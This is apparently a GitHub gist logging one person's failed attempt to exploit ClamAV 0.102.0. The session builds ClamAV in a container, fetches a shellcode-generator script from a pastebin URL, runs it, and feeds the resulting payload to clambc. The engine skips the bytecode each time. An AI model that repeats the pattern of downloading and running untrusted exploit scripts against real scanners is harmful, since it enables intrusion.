Last active
November 4, 2019 01:22
-
-
Save zv/7ffb7d4a133ea4b41662e64d6bfe145a to your computer and use it in GitHub Desktop.
toolbox clamav exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [zv@sigstkflt] ~ >> toolbox enter -c clamav | |
| toolbox: container clamav not found | |
| Creating toolbox container clamav instead. | |
| Use the 'create' command to create a different toolbox. | |
| Try 'toolbox --help' for more information. | |
| ⬢[zv@toolbox ~]$ sudo dnf -qy builddep clamav | |
| ⬢[zv@toolbox ~]$ wget https://www.clamav.net/downloads/production/clamav-0.102.0.tar.gz && tar -xvf clam* && cd clam*; | |
| ⬢[zv@toolbox clamav-0.102.0]$ ( CFLAGS='-Og -g -march=native' CXXFLAGS="$CFLAGS" ./configure && make -j4 ) > /dev/null | |
| ⬢[zv@toolbox clamav-0.102.0]$ wget http://pastebin.com/raw/cfP7X89m -O clam_shellcode.py | |
| ⬢[zv@toolbox clamav-0.102.0]$ python3 clam_shellcode.py | |
| File "/tmp/clam_shellcode.py", line 158 | |
| print 'Invalid string.' | |
| ^ | |
| SyntaxError: Missing parentheses in call to 'print'. Did you mean print('Invalid string.')? | |
| ⬢[zv@toolbox clamav-0.102.0]$ python clam_shellcode.py | |
| [+] Adding null-byte at the end of the string.. | |
| [+] Adding null-byte at the end of the string.. | |
| [+] Adding null-byte at the end of the string.. | |
| [+] Adding null-byte at the end of the string.. | |
| [+] Adding null-byte at the end of the string.. | |
| [+] Generated payload | |
| ⬢[zv@toolbox clamav-0.102.0]$ clambc --debug exploit | |
| LibClamAV debug: searching for unrar, user-searchpath: /usr/local/lib64 | |
| LibClamAV debug: unrar support loaded from /usr/local/lib64/libclamunrar_iface.so.9.0.4 libclamunrar_iface_so_9_0 | |
| LibClamAV debug: Bytecode initialized in interpreter mode | |
| LibClamAV debug: Loading trusted bytecode | |
| LibClamAV debug: Skipping bytecode with (engine) functionality level 0-93 (current 111) | |
| LibClamAV debug: line: 4096 | |
| LibClamAV debug: Parsed 0 functions | |
| bytecode load skipped | |
| ⬢[zv@toolbox clamav-0.102.0]$ clambc --help | |
| Clam AntiVirus: Bytecode Testing Tool 0.102.0 | |
| By The ClamAV Team: https://www.clamav.net/about.html#credits | |
| (C) 2019 Cisco Systems, Inc. | |
| clambc <file> [function] [param1 ...] | |
| --help -h Show this help | |
| --version -V Show version | |
| --debug Show debug | |
| --force-interpreter -f Force using the interpreter instead of the JIT | |
| --trust-bytecode -t Trust loaded bytecode (default yes) | |
| --info -i Print information about bytecode | |
| --printsrc -p Print bytecode source | |
| --printbcir -c Print IR of bytecode signature | |
| --input -c Input file to run the bytecode on | |
| --trace <level> -T Set bytecode trace level 0..7 (default 7) | |
| --no-trace-showsource -s Don't show source line during tracing | |
| --statistics=bytecode Collect and print bytecode execution statistics | |
| file File to test | |
| ⬢[zv@toolbox clamav-0.102.0]$ clambc -f -t --debug -T 7 --statistics=bytecode -p -c exploit | |
| LibClamAV debug: searching for unrar, user-searchpath: /usr/local/lib64 | |
| LibClamAV debug: unrar support loaded from /usr/local/lib64/libclamunrar_iface.so.9.0.4 libclamunrar_iface_so_9_0 | |
| LibClamAV debug: Loading trusted bytecode | |
| LibClamAV debug: Skipping bytecode with (engine) functionality level 0-93 (current 111) | |
| LibClamAV debug: line: 4096 | |
| LibClamAV debug: Parsed 0 functions | |
| LibClamAV debug: cli_event_define error for time event id 0 | |
| bytecode load skipped | |
| ⬢[zv@toolbox clamav-0.102.0]$ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment